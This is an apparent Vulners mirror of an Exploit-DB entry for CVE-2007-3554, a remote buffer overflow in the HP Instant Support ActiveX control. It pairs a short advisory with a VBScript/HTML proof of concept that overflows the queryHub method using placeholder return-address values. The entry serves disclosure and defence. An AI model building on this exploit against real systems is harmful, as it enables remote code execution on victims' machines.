Lucene search
+L

HP Instant Support - ActiveX Control Driver Check Buffer Overflow

🗓️ 01 Apr 2007 00:00:00Reported by John HeasmanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

HP Instant Support ActiveX Buffer Overflow Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-3554
4 Jul 200715:00
cve
Cvelist
CVE-2007-3554
4 Jul 200715:00
cvelist
Exploit DB
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
2 Jul 200700:00
exploitdb
Tenable Nessus
HP Instant Support Driver Check HPSDDX Class (SDD) ActiveX (sdd.dll) queryHub Function Overflow
3 Jul 200700:00
nessus
NVD
CVE-2007-3554
4 Jul 200715:30
nvd
Prion
Stack overflow
4 Jul 200715:30
prion
source: https://www.securityfocus.com/bid/24730/info

HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.

 <html>
 <object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
  <script language = 'vbscript'>

   buff             = String(222, "A")

   get_EBP          = "cccc"

   get_EIP          = unescape("aaaa")

   buf1             = unescape("bbbb")

   second_exception = unescape("%00%00%92%00")

   first_exception  = unescape("%00%00%92%00")

   buf2             = String(4000, "B")

   egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2

   test.queryHub egg

 </script>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.6
EPSS0.1787
19